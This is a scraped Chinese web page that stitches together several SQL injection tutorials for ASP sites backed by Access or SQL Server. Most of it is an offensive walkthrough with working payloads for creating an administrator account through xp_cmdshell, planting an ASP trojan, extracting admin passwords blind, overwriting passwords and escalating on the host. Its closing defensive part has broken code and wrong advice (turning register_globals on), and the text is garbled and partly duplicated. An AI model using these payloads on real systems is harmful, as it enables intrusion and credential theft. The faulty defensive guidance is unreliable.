關于SQL注入
二SQL注入思路
創(chuàng)新互聯公司堅持“要么做到,要么別承諾”的工作理念�����,服務領域包括:網站制作�、成都網站建設��、企業(yè)官網���、英文網站���、手機端網站�����、網站推廣等服務�����,滿足客戶于互聯網時代的龍川網站設計���、移動媒體設計的需求,幫助企業(yè)找到有效的互聯網解決方案��。努力成為您成熟可靠的網絡建設合作伙伴����!
思路最重要。其實好多人都不知道SQL到底能做什么呢�����?這里總結一下SQL注入入侵的總體的思路:
1. SQL注入漏洞的判斷���,即尋找注入點
2. 判斷后臺數據庫類型
3. 確定XP_CMDSHELL可執(zhí)行情況���;若當前連接數據的帳號具有SA權限,且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統(tǒng)的shell)能夠正確執(zhí)行�,則整個計算機可以通過幾種方法完全控制,也就完成了整個注入過程���,否則繼續(xù):
1. 發(fā)現WEB虛擬目錄
2. 上傳ASP木馬���;
3. 得到管理員權限
具體步驟:
一、SQL注入漏洞的判斷
如果以前沒玩過注入�,請把IE菜單-工具-Internet選項-高級-顯示友好HTTP錯誤信息前面的勾去掉。
為了把問題說明清楚�����,以下以(這個地址是假想的)����,為例進行分析,xx可能是整型���,也有可能是字符串�����。
1�、整型參數的判斷
當輸入的參數xx為整型時,通常news.asp中SQL語句原貌大致如下:
select * from 表名 where 字段=xx�,所以可以用以下步驟測試SQL注入是否存在。
最簡單的判斷方法
’(附加一個單引號)�����,
此時news.asp中的SQL語句變成了
select * from 表名 where 字段=xx’�����,
如果程序沒有過濾好“’”的話�����,就會提示 news.asp運行異常��;但這樣的方法雖然很簡單�����,但并不是最好的���,因為:
first,不一定每臺服務器的IIS都返回具體錯誤提示給客戶端��,如果程序中加了cint(參數)之類語句的話����,SQL注入是不會成功的���,但服務器同樣會報錯��,具體提示信息為處理 URL 時服務器上出錯�����。請和系統(tǒng)管理員聯絡����。
second�����,目前大多數程序員已經將“’“ 過濾掉���,所以用” ’”測試不到注入點��,所以一般使用經典的1=1和1=2測試方法����,見下文:
and 1=1, news.asp運行正常,
而且與運行結果相同���;
and 1=2, news.asp運行異常�����;(這就是經典的 1=1 1=2 判斷方法)
如果以上面滿足�����,news.asp中就會存在SQL注入漏洞���,反之則可能不能注入。
2�、字符串型參數的判斷
方法與數值型參數判斷方法基本相同
當輸入的參數xx為字符串時,通常news.asp中SQL語句原貌大致如下:
select * from 表名 where 字段='xx'��,所以可以用以下步驟測試SQL注入是否存在����。
’(附加一個單引號),此時news.asp中的SQL語句變成了
select * from 表名 where 字段=xx’����,news.asp運行異常�;
and '1'='1', news.asp運行正常�,
而且與運行結果相同;
and '1'='2', news.asp運行異常�����;
如果以上滿足�����,則news.asp存在SQL注入漏洞���,反之則不能注入
3、特殊情況的處理
有時ASP程序員會在程序員過濾掉單引號等字符��,以防止SQL注入��。此時可以用以下幾種方法試一試����。
①大小定混合法:由于VBS并不區(qū)分大小寫,而程序員在過濾時通常要么全部過濾大寫字符串����,要么全部過濾小寫字符串�����,而大小寫混合往往會被忽視��。如用SelecT代替select,SELECT等����;
②UNICODE法:在IIS中����,以UNICODE字符集實現國際化,我們完全可以IE中輸入的字符串化成UNICODE字符串進行輸入�����。如+ =%2B��,空格=%20 等�;URLEncode信息參見附件一;
③ASCII碼法:可以把輸入的部分或全部字符全部
4出了上述方法以外���,還有個更簡單的方法就是使用現成的工具像NB聯盟的NBSI就是一款很不錯的工具���,目前最新的版本為2.2
二����、判斷數據庫類型
不同的數據庫的函數�����、注入方法都是有差異的��,所以在注入之前��,我們還要判斷一下數據庫的類型����。一般ASP最常搭配的數據庫是Access和SQLServer�,網上超過99%的網站都是其中之一。
怎么讓程序告訴你它使用的什么數據庫呢�?來看看:
SQLServer有一些系統(tǒng)變量,如果服務器IIS提示沒關閉�,并且SQLServer返回錯誤提示的話,那可以直接從出錯信息獲取�,方法如下:
;and user0
這句語句很簡單,但卻包含了SQLServer特有注入方法的精髓����,我自己也是在一次無意的測試中發(fā)現這種效率極高的猜解方法����。讓我看來看看它的含義:首先�,前面的語句是正常的,重點在and user0�����,我們知道�����,user是SQLServer的一個內置變量��,它的值是當前連接的用戶名�,類型為nvarchar。拿一個 nvarchar的值跟int的數0比較���,系統(tǒng)會先試圖將nvarchar的值轉成int型���,當然,轉的過程中肯定會出錯,SQLServer的出錯提示是:將nvarchar值 ”abc” 轉換數據類型為 int 的列時發(fā)生語法錯誤���,呵呵�����,abc正是變量user的值���,這樣,不廢吹灰之力就拿到了數據庫的用戶名��。在以后的篇幅里�����,大家會看到很多用這種方法的語句����。 順便說幾句��,眾所周知�,SQLServer的用戶sa是個等同Adminstrators權限的角色,拿到了sa權限�����,幾乎肯定可以拿到主機的 Administrator了。上面的方法可以很方便的測試出是否是用sa登錄����,要注意的是:如果是sa登錄,提示是將”dbo”轉換成int的列發(fā)生錯誤����,而不是”sa”。
如果服務器IIS不允許返回錯誤提示���,那怎么判斷數據庫類型呢��?我們可以從Access和SQLServer和區(qū)別入手�����,Access和 SQLServer都有自己的系統(tǒng)表����,比如存放數據庫中所有對象的表��,Access是在系統(tǒng)表[msysobjects]中�����,但在Web環(huán)境下讀該表會提示“沒有權限”,SQLServer是在表[sysobjects]中���,在Web環(huán)境下可正常讀取�。
在確認可以注入的情況下����,使用下面的語句:
;and (select count(*) from sysobjects)0
;and (select count(*) from msysobjects)0
如果數據庫是SQLServer,那么第一個網址的頁面與原頁面是大致相同的�����;而第二個網址�,由于找不到表msysobjects,會提示出錯����,就算程序有容錯處理,頁面也與原頁面完全不同��。
如果數據庫用的是Access��,那么情況就有所不同����,第一個網址的頁面與原頁面完全不同;第二個網址��,則視乎數據庫設置是否允許讀該系統(tǒng)表��,一般來說是不允許的��,所以與原網址也是完全不同����。大多數情況下,用第一個網址就可以得知系統(tǒng)所用的數據庫類型���,第二個網址只作為開啟IIS錯誤提示時的驗證��。
三����、確定XP_CMDSHELL可執(zhí)行情況
若當前連接數據的帳號具有SA權限��,且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統(tǒng)的shell)能夠正確執(zhí)行����,則整個計算機可以通過以下幾種方法完全控制����,以后的所有步驟都可以省
1���、 and user;0 news.asp執(zhí)行異常但可以得到當前連接數據庫的用戶名(若顯示dbo則代表SA)�。
2����、 and db_name()0 news.asp執(zhí)行異常但可以得到當前連接的數據庫名。
3���、�;exec master..xp_cmdshell “net user aaa bbb /add”-- (master是SQL-SERVER的主數據
庫��;名中的分號表示SQL-SERVER執(zhí)行完分號前的語句名�,繼續(xù)執(zhí)行其后面的語句;“—”號是注解����,表示其后面的所有內容僅為注釋,系統(tǒng)并不執(zhí)行)可以直接增加操作系統(tǒng)帳戶aaa,密碼為bbb�。
4、���;exec master..xp_cmdshell “net localgroup administrators aaa /add”-- 把剛剛增加
的帳戶aaa加到administrators組中�����。
5����、����;backuup database 數據庫名 to disk='c:\inetpub\wwwroot\save.db' 則把得到的數據內容
全部備份到WEB目錄下,再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)�。
6、通過復制CMD創(chuàng)建UNICODE漏洞
;exec master.dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe
c:\inetpub\scripts\cmd.exe” 便制造了一個UNICODE漏洞�����,通過此漏洞的利用方法����,便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。
這樣你就成功的完成了一次SQL注入攻擊����,先別興奮�,在實踐時你就會發(fā)現這比理論要難的多會有更多的困難等著你come over �����,下面GO ON如果上述條件不成立則需繼續(xù)奮斗(要掛馬了:))
GO ON~!
當上述條件不成立時就要繼續(xù)下面的步驟
(一)�、發(fā)現WEB虛擬目錄
只有找到WEB虛擬目錄,才能確定放置ASP木馬的位置����,進而得到USER權限。有兩種方法比較有效�����。
一是根據經驗猜解�����,一般來說����,WEB虛擬目錄是:c:\inetpub\wwwroot;
D:\inetpub\wwwroot; E:\inetpub\wwwroot等,而可執(zhí)行虛擬目錄是:
c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等���。
二是遍歷系統(tǒng)的目錄結構�����,分析結果并發(fā)現WEB虛擬目錄�;
先創(chuàng)建一個臨時表:temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3
nvarchar(255));--
接下來:
1 我們可以利用xp_availablemedia來獲得當前所有驅動器,并存入temp表中:
;insert temp exec master.dbo.xp_availablemedia;--
我們可以通過查詢temp的內容來獲得驅動器列表及相關信息
2 我們可以利用xp_subdirs獲得子目錄列表,并存入temp表中:
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
3 我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,并寸入temp表中:
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
這樣就可以成功的瀏覽到所有的目錄(文件夾)列表:
如果我們需要查看某個文件的內容,可以通過執(zhí)行xp_cmdsell:
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中�����。如:bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
瀏覽temp就可以看到index.asp文件的內容了����!通過分析各種ASP文件�,可以得到大量系統(tǒng)信息,WEB建設與管理信息�,甚至可以得到SA帳號的連接密碼。
當然��,如果xp_cmshell能夠執(zhí)行��,我們可以用它來完成:
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
通過xp_cmdshell我們可以看到所有想看到的����,包括W3svc
;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript
C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'
但是,如果不是SA權限����,我們還可以使用
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
注意:
1��、以上每完成一項瀏覽后�,應刪除TEMP中的所有內容����,刪除方法是:
;delete from temp;--
2、瀏覽TEMP表的方法是:(假設TestDB是當前連接的數據庫名)
and (select top 1 id from TestDB.dbo.temp )0
得到表TEMP中第一條記錄id字段的值��,并與整數進行比較��,顯然news.asp工作異常��,但在異常中卻可以發(fā)現id字段的值���。假設發(fā)現的表名是xyz���,則
and (select top 1 id from TestDB.dbo.temp )0 where id not in('xyz'))0
得到表TEMP中第二條記錄id字段的值。
(二)�����、上傳ASP木馬
所謂ASP木馬,就是一段有特殊功能的ASP代碼�����,并放入WEB虛擬目錄的Scripts下��,遠程客戶通過IE就可執(zhí)行它�,進而得到系統(tǒng)的USER權限,實現對系統(tǒng)的初步控制�。上傳ASP木馬一般有兩種比較有效的方法:
1、利用WEB的遠程管理功能
許多WEB站點�����,為了維護的方便�����,都提供了遠程管理的功能��;也有不少WEB站點����,其內容是對于不同的用戶有不同的訪問權限����。為了達到對用戶權限的控制���,都有一個網頁,要求用戶名與密碼����,只有輸入了正確的值,才能進行下一步的操作,可以實現對WEB的管理��,如上傳���、下載文件��,目錄瀏覽����、修改配置等����。
因此,若獲取正確的用戶名與密碼���,不僅可以上傳ASP木馬���,有時甚至能夠直接得到USER權限而瀏覽系統(tǒng)�,上一步的“發(fā)現WEB虛擬目錄”的復雜操作都可省略����。
用戶名及密碼一般存放在一張表中,發(fā)現這張表并讀取其中內容便解決了問題����。以下給出兩種有效方法。
A��、 注入法:
從理論上說����,認證網頁中會有型如:
select * from admin where username='XXX' and password='YYY' 的語句����,若在正式運行此句之前,沒有進行必要的字符過濾��,則很容易實施SQL注入��。
如在用戶名文本框內輸入:abc’ or 1=1-- 在密碼框內輸入:123 則SQL語句變成:
select * from admin where username='abc’ or 1=1 and password='123’
不管用戶輸入任何用戶名與密碼���,此語句永遠都能正確執(zhí)行�,用戶輕易騙過系統(tǒng),獲取合法身份�。
B、猜解法:
基本思路是:猜解所有數據庫名稱��,猜出庫中的每張表名�����,分析可能是存放用戶名與密碼的表名�����,猜出表中的每個字段名��,猜出表中的每條記錄內容�。
a 猜解所有數據庫名稱
and (select count(*) from master.dbo.sysdatabases where name1 and dbid=6) 0
因為dbid的值從1到5,是系統(tǒng)用了���。所以用戶自己建的一定是從6開始的�����。并且我們提交了 name1 (name字段是一個字符型的字段和數字比較會出錯),news.asp工作異常�����,可得到第一個數據庫名��,同理把DBID分別改成7,8�����,9,10,11,12…就可得到所有數據庫名�。
以下假設得到的數據庫名是TestDB。
b 猜解數據庫中用戶名表的名稱
猜解法:此方法就是根據個人的經驗猜表名����,一般來說,
user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,
systemusers,sysuser,sysusers,sysaccounts,systemaccounts等�。并通過語句進行判斷
and (select count(*) from TestDB.dbo.表名)0 若表名存在,則news.asp工作正常���,否則異常。如此循環(huán)����,直到猜到系統(tǒng)帳號表的名稱。
讀取法:SQL-SERVER有一個存放系統(tǒng)核心信息的表sysobjects����,有關一個庫的所有表����,視圖等信息全部存放在此表中����,而且此表可以通過WEB進行訪問。
當xtype='U' and status0代表是用戶建立的表�,發(fā)現并分析每一個用戶建立的表及名稱,便可以得到用戶名表的名稱��,基本的實現方法是:
① and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status0 )0
得到第一個用戶建立表的名稱��,并與整數進行比較�,顯然news.asp工作異常,但在異常中卻可以發(fā)現表的名稱���。假設發(fā)現的表名是xyz�����,則
② and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status0 and
name not in('xyz'))0 可以得到第二個用戶建立的表的名稱���,同理就可得到所有用建立的表的名稱���。
根據表的名稱,一般可以認定那張表用戶存放用戶名及密碼�,以下假設此表名為Admin。
c 猜解用戶名字段及密碼字段名稱
admin表中一定有一個用戶名字段�,也一定有一個密碼字段,只有得到此兩個字段的名稱����,才有可能得到此兩字段的內容。如何得到它們的名稱呢�,同樣有以下兩種方法。
猜解法:此方法就是根據個人的經驗猜字段名�,一般來說,用戶名字段的名稱常用:username,name,user,account等���。而密碼字段的名稱常用:password,pass,pwd,passwd等����。并通過語句進行判斷
and (select count(字段名) from TestDB.dbo.admin)0 “select count(字段名) from 表名”
語句得到表的行數�����,所以若字段名存在��,則news.asp工作正常���,否則異常�。如此循環(huán)�,直到猜到兩個字段的名稱。
讀取法:基本的實現方法是
and (select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects)0 ��。
select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一個字段名��,當與整數進行比較�����,顯然news.asp工作異常����,但在異常中卻可以發(fā)現字段的名稱。把col_name(object_id('admin'),1)中的1依次換成2,3,4,5��,6…就可得到所有的字段名稱�。
d 猜解用戶名與密碼
猜用戶名與密碼的內容最常用也是最有效的方法有:
ASCII碼逐字解碼法:雖然這種方法速度較慢,但肯定是可行的����?�;镜乃悸肥窍炔鲁鲎侄蔚拈L度���,然后依次猜出每一位的值。猜用戶名與猜密碼的方法相同�����,以下以猜用戶名為例說明其過程����。
and (select top 1 len(username) from TestDB.dbo.admin)=X(X=1,2,3,4����,5,… n�����,username
為用戶名字段的名稱����,admin為表的名稱),若x為某一值i且news.asp運行正常時,則i就是第一個用戶名的長度���。如:當輸入
and (select top 1 len(username) from TestDB.dbo.admin)=8時news.asp運行正常,則第一個用戶名的長度為8
and (select top 1 ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用戶名長度之間���,當m=1����,2,3�,…時猜測分別猜測第1,2,3,…位的值;n的值是1~9�����、a~z��、A~Z的ASCII值�,也就是1~128之間的任意值;admin為系統(tǒng)用戶帳號表的名稱)�,若n為某一值i且news.asp運行正常時,則i對應ASCII碼就是用戶名某一位值�����。如:當輸入
and (select top 1 ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時news.asp運行正常,則用戶名的第三位為P(P的ASCII為80)����; and (select top 1 ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時news.asp運行正常,則用戶名的第9位為!(!的ASCII為80)�;猜到第一個用戶名及密碼后,同理��,可以猜出其他所有用戶名與密碼��。注意:有時得到的密碼可能是經MD5等方式加密后的信息�,還需要用專用工具進行脫密?��;蛘呦雀钠涿艽a�,使用完后再改回來�����,見下面說明���。簡單法:猜用戶名用 and (select top 1 flag from TestDB.dbo.admin where username1) , flag是admin表中的一個字段����,username是用戶名字段,此時news.asp工作異常���,但能得到Username的值�。與上同樣的方法���,可以得到第二用戶名,第三個用戶等等�����,直到表中的所有用戶名��。
猜用戶密碼: and (select top 1 flag from TestDB.dbo.admin where pwd1) , flag是admin表中的一個字段����,pwd是密碼字段,此時news.asp工作異常����,但能得到pwd的值。與上同樣的方法�,可以得到第二用戶名的密碼,第三個用戶的密碼等等�,直到表中的所有用戶的密碼�����。密碼有時是經MD5加密的�,可以改密碼����。
;update TestDB.dbo.admin set pwd=' a0b923820dcc509a' where username='www';-- ( 1的MD5值為:AAABBBCCCDDDEEEF,即把密碼改成1�����;www為已知的用戶名)用同樣的方法當然可把密碼改原來的值��。
2�、利用表內容導成文件功能
SQL有BCP命令,它可以把表的內容導成文本文件并放到指定位置����。利用這項功能,我們可以先建一張臨時表�,然后在表中一行一行地輸入一個ASP木馬,然后用BCP命令導出形成ASP文件�。
命令行格式如下:
bcp "select * from text..foo" queryout c:\inetpub\wwwroot\163.asp –c –S localhost –U sa –P foobar
('S'參數為執(zhí)行查詢的服務器,'U'參數為用戶名�,'P'參數為密碼��,最終上傳了一個163.asp的木馬)
3�、利用工具���,如NBSI給出的一些參考數據最重要的表名:
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses
最重要的一些用戶名(默認sql數據庫中存在著的)
public
dbo
guest(一般禁止�����,或者沒權限)
db_sercurityadmin
ab_dlladmin
一些默認擴展
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia 驅動器相關
xp_dirtree 目錄
xp_enumdsn ODBC連接
xp_loginconfig 服務器安全模式信息
xp_makecab 創(chuàng)建壓縮卷
xp_ntsec_enumdomains domain信息
xp_terminate_process 終端進程��,給出一個PID
(三)�、得到系統(tǒng)的管理員權限
ASP木馬只有USER權限�,要想獲取對系統(tǒng)的完全控制��,還要有系統(tǒng)的管理員權限�。怎么辦?提升權限的方法有很多種:
上傳木馬���,修改開機自動運行的.ini文件(它一重啟�����,便死定了)�;
復制CMD.exe到scripts,人為制造UNICODE漏洞�����;
下載SAM文件����,破解并獲取OS的所有用戶名密碼;
等等���,視系統(tǒng)的具體情況而定�����,可以采取不同的方法����。
那么我們怎么防注入呢�?程序如下加入到asp或html或php或cgi里面都可以。經過測試����。加入如 top.asp文件中開頭
方法一:
%if session("username"="" or session("userkey"="" then
response.redirect "../../"
end if%
(說明:只要有用戶注入則跳轉到../../目錄,呵呵�,看你怎么給我注入)
方法二:
%
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER")
server_v2=Cstr(Request.ServerVariables("SERVER_NAME")
if mid(server_v1,8,len(server_v2))server_v2 then
response.write "brbrcentertable border=1 cellpadding=20 bordercolor=black bgcolor=#EEEEEE width=450"
response.write "trtd style=“font:9pt Verdana""
response.write "你提交的路徑有誤��,禁止從站點外部提交數據請不要亂該參數���!"
response.write "/td/tr/table/center"
response.end
end if
%
(說明:只要有用戶注入則判斷為外部連接哦,呵呵�,看你怎么給我注入)
方法三:
% dim From_url,Serv_url
From_url = Cstr(Request.ServerVariables("HTTP_REFERER")
Serv_url = Cstr(Request.ServerVariables("SERVER_NAME")
if mid(From_url,8,len(Serv_url)) Serv_url then
response.write "NO"
response.redirect("../"
response.end
end if%
網站如何防止sql注入攻擊的解決辦法
首先我們來了解下什么是SQL注入,SQL注入簡單來講就是將一些非法參數插入到網站數據庫中去�����,執(zhí)行一些sql命令��,比如查詢數據庫的賬號密碼�����,數據庫的版本��,數據庫服務器的IP等等的一些操作�����,sql注入是目前網站漏洞中危害最大的一個漏洞��,受攻擊的網站占大多數都是sql注入攻擊���。
sql注入攻擊用英語來講Structured Query Language��,在網站的編程語言當中是一種比較另類的網站開發(fā)語言��,我們網站安全行業(yè)通常來講sql是用來數據庫查詢的一種網站開發(fā)語言�����,同時也是一種腳本文件的一個文件名��,通俗來講sql就是用來對網站的數據庫進行查詢���,以及增加,寫入�,更新數據庫的一個sql數據庫操作。
關于數據庫我們分為2種數據庫�����,一種是關系數據庫�,非關系數據庫,那么目前網站使用的都是關系數據庫�����,關系數據庫分為sql數據庫,microsoft sql server數據庫�����,ACC數據庫�����,mysql數據庫���,oracle數據庫�,DB2數據庫���,postgresql數據庫等等的關系數據庫����,非關系數據庫分為nosql數據庫�����,可以存儲很大數據����,針對于一些并發(fā)較高,存儲較多��,云計算的場景�,頻繁讀取寫入的數據庫,像memcachedb,redis,mongodb等等非關系數據庫���。
那么什么是sql注入呢�? 簡單來講就是對網站強行進行插入數據���,執(zhí)行sql惡意語句對網站進行攻擊�,對網站進行sql注入嘗試�����,可以獲取一些私密的信息�����,像數據庫的版本�����,管理員的賬號密碼等等。
關于如何防止sql注入攻擊��,我們從以下幾點開始入手
首先我們可以了解到sql注入攻擊都是通過拼接的方式�����,把一些惡意的參數拼接到一起���,然后在網站的前端中插入����,并執(zhí)行到服務器后端到數據庫中去�����,通常我們在寫PHP網站代碼的時候會將get ID這個參數值獲取到后直接拼接到后端服務器中去�,查詢數據庫,但是如果拼接了一些惡意的非法參數�����,那么久可以當做sql語句來執(zhí)行���,如果防止sql注入呢���?
為了防止網站被sql注入攻擊,我們應該從一開始寫代碼的時候就應該過濾一些sql注入的非法參數�����,將查詢的一些sql語句�,以及用戶輸入的參數值都以字符串的方式來處理,不論用戶輸入的什么東西���,在sql查詢的時候只是一段字符串��,這樣構造的任何惡意參數都會以字符串的方式去查詢數據庫�,一直惡意的sql注入攻擊就不會被執(zhí)行�����,sql注入語句也就沒有效果了�,再一個就是網站里的任何一個可以寫入的地方盡可能的嚴格過濾與限制,漏下一個可以輸入的地方網站就會被攻擊��,網站就會被黑��,所有做的網站安全就會沒有效果�,包括一些get,post,cookie方式的提交都是不可信的�����,像數據表里referer user-agent等字段都是可以偽造�����,寫入sql注入語句的���,像前端時間爆發(fā)的ecshop漏洞利用的就是user.php,偽造referer參數進行了sql注入,執(zhí)行了遠程代碼����。
再一個防止sql注入的方法就是開啟PHP的魔術配置,開啟安全配置模式����,將safe_mode開啟on.以及關閉全局變量模式,register_globals參數設置為on,magic_quotes_gpc參數開啟��,防止sql注入.如果對網站防止sql注入不懂的話��,也可以找專業(yè)的網站安全公司來做安全��,防止sql注入����。
sql 注入攻擊原理����?
有的頁面是用url傳值的����,;group=1
我們可以拿到其中的一段url���,然后根據url去才后臺數據庫的代碼�。
比如一段java代碼
String sql="select * from user where loginid='"+loginid+"'";
loginid這個是你從頁面輸入的是用戶名����。
如果loginid你輸入‘ or 1=1 or loginid=’
這樣最終形成的sql就是
select * from user where loginid='‘ or 1=1 or loginid=’‘;
這個sql是可以運行的����。類似這樣。
看一下這個
什么是sql注入攻擊 和 腳本注入攻擊�?
sql注入,����,就是利用網站的一些SQL漏洞����,��,進行注入����,,打個比方ASP寫的下面一句
select * from user where userid=" request.queryString("userid")
向上面的語句就可以實現SQL注入了�。。
具體怎么注入我就不講了���,內容太多了��。�。你下載個阿D注入工具用一下就明白了��。
腳本注入利用的是上傳漏洞��。�。。也是上傳的時候檢查不夠嚴格���,打比方沒有檢測擴展名��,��,
如何防治SQL注入��?
隨著B/S模式應用開發(fā)的發(fā)展�,使用這種模式編寫應用程序的程序員也越來越多。但是由于這個行業(yè)的入門門檻不高����,程序員的水平及經驗也參差不齊���,相當大一部分程序員在編寫代碼的時候��,沒有對用戶輸入數據的合法性進行判斷�,使應用程序存在安全隱患���。用戶可以提交一段數據庫查詢代碼�����,根據程序返回的結果����,獲得某些他想得知的數據,這就是所謂的SQL Injection�,即SQL注入。
SQL注入是從正常的WWW端口訪問�,而且表面看起來跟一般的Web頁面訪問沒什么區(qū)別,所以目前市面的防火墻都不會對SQL注入發(fā)出警報
�,如果管理員沒查看IIS日志的習慣,可能被入侵很長時間都不會發(fā)覺����。
但是,SQL注入的手法相當靈活�,在注入的時候會碰到很多意外的情況。能不能根據具體情況進行分析�,構造巧妙的SQL語句,從而成功獲取想要的數據����,是高手與“菜鳥”的根本區(qū)別。
根據國情����,國內的網站用ASP+Access或SQLServer的占70%以上,PHP+MySQ占L20%����,其他的不足10%��。在本文�,我們從分入門��、進階至高級講解一下ASP注入的方法及技巧�,PHP注入的文章由NB聯盟的另一位朋友zwell撰寫,希望對安全工作者和程序員都有用處�。了解 ASP注入的朋友也請不要跳過入門篇,因為部分人對注入的基本判斷方法還存在誤區(qū)����。大家準備好了嗎?Let's Go...
入門篇
如果你以前沒試過SQL注入的話���,那么第一步先把IE菜單=工具=Internet選項=高級=顯示友好 HTTP 錯誤信息前面的勾去掉。否則����,不論服務器返回什么錯誤,IE都只顯示為HTTP 500服務器錯誤�,不能獲得更多的提示信息。
第一節(jié)�����、SQL注入原理
以下我們從一個網站開始(注:本文發(fā)表前已征得該站站長同意,大部分都是真實數據)��。
在網站首頁上�����,有名為“IE不能打開新窗口的多種解決方法”的鏈接�����,地址為:����,我們在這個地址后面加上單引號’,服務器會返回下面的錯誤提示:
Microsoft JET Database Engine 錯誤 '80040e14'
字符串的語法錯誤 在查詢表達式 'ID=49'' 中�����。
/showdetail.asp��,行8
從這個錯誤提示我們能看出下面幾點:
1. 網站使用的是Access數據庫�,通過JET引擎連接數據庫,而不是通過ODBC��。
2. 程序沒有判斷客戶端提交的數據是否符合程序要求。
3. 該SQL語句所查詢的表中有一名為ID的字段���。
從上面的例子我們可以知道�����,SQL注入的原理�,就是從客戶端提交特殊的代碼��,從而收集程序及服務器的信息�����,從而獲取你想到得到的資料����。
第二節(jié)、判斷能否進行SQL注入
看完第一節(jié)�,有一些人會覺得:我也是經常這樣測試能否注入的����,這不是很簡單嗎?
其實�,這并不是最好的方法,為什么呢?
首先�����,不一定每臺服務器的IIS都返回具體錯誤提示給客戶端�����,如果程序中加了cint(參數)之類語句的話���,SQL注入是不會成功的����,但服務器同樣會報錯�����,具體提示信息為處理 URL 時服務器上出錯�����。請和系統(tǒng)管理員聯絡��。
其次�,部分對SQL注入有一點了解的程序員���,認為只
要把單引號過濾掉就安全了,這種情況不為少數����,如果你用單引號測試,是測不到注入點的
那么�,什么樣的測試方法才是比較準確呢?答案如下:
①
② ;and 1=1
③ ;and 1=2
這就是經典的1=1�����、1=2測試法了��,怎么判斷呢�?看看上面三個網址返回的結果就知道了:
可以注入的表現:
① 正常顯示(這是必然的,不然就是程序有錯誤了)
② 正常顯示���,內容基本與①相同
③ 提示BOF或EOF(程序沒做任何判斷時)��、或提示找不到記錄(判斷了rs.eof時)����、或顯示內容為空(程序加了on error resume next)
不可以注入就比較容易判斷了�,①同樣正常顯示,②和③一般都會有程序定義的錯誤提示��,或提示類型轉換時出錯��。
當然����,這只是傳入參數是數字型的時候用的判斷方法,實際應用的時候會有字符型和搜索型參數�,我將在中級篇的“SQL注入一般步驟”再做分析。
第三節(jié)���、判斷數據庫類型及注入方法
不同的數據庫的函數�、注入方法都是有差異的�,所以在注入之前,我們還要判斷一下數據庫的類型����。一般ASP最常搭配的數據庫是Access和SQLServer,網上超過99%的網站都是其中之一��。
怎么讓程序告訴你它使用的什么數據庫呢��?來看看:
SQLServer有一些系統(tǒng)變量�����,如果服務器IIS提示沒關閉,并且SQLServer返回錯誤提示的話��,那可以直接從出錯信息獲取����,方法如下:
;and user0
這句語句很簡單,但卻包含了SQLServer特有注入方法的精髓�,我自己也是在一次無意的測試中發(fā)現這種效率極高的猜解方法。讓我看來看看它的含義:首先����,前面的語句是正常的,重點在and user0�����,我們知道���,user是SQLServer的一個內置變量��,它的值是當前連接的用戶名�����,類型為nvarchar�。拿一個 nvarchar的值跟int的數0比較�,系統(tǒng)會先試圖將nvarchar的值轉成int型,當然��,轉的過程中肯定會出錯��,SQLServer的出錯提示是:將nvarch
ar值 ”abc” 轉換數據類型為 int 的列時發(fā)生語法錯誤����,呵呵,abc正是變量user的值����,這樣,不廢吹灰之力就拿到了數據庫的用戶名�����。在以后的篇幅里���,大家會看到很多用這種方法的語句���。
順便說幾句����,眾所周知�����,SQLServer的用戶sa是個等同Adminstrators權限的角色��,拿到了sa權限����,幾乎肯定可以拿到主機的 Administrator了。上面的方法可以很方便的測試出是否是用sa登錄����,要注意的是:如果是sa登錄,提示是將”dbo”轉換成int的列發(fā)生錯誤�����,而不是”sa”�����。
如果服務器IIS不允許返回錯誤提示,那怎么判斷數據庫類型呢���?我們可以從Access和SQLServer和區(qū)別入手��,Access和 SQLServer都有自己的系統(tǒng)表�,比如存放數據庫中所有對象的表�,Access是在系統(tǒng)表[msysobjects]中�����,但在Web環(huán)境下讀該表會提示“沒有權限”�,SQLServer是在表[sysobjects]中,在Web環(huán)境下可正常讀取����。
在確認可以注入的情況下,使用下面的語句:
;and (select count(*) from sysobjects)0
;and (select count(*) from msysobjects)0
如果數據庫是SQLServer�����,那么第一個網址的頁面與原頁面 49是大致相同的�����;而第二個網址,由于找不到表msysobjects��,會提示出錯�,就算程序有容錯處理,頁面也與原頁面完全不同�����。
如果數據庫用的是Access����,那么情況就有所不同,第一個網址的頁面與原頁面完全不同�;第二個網址,則視乎數據庫設置是否允許讀該系統(tǒng)表���,一般來說是不允許的�,所以與原網址也是完全不同��。大多數情況下���,用第一個網址就可以得知系統(tǒng)所用的數據庫類型��,第二個網址只作為開啟IIS錯誤提示時的驗證���。
進階篇
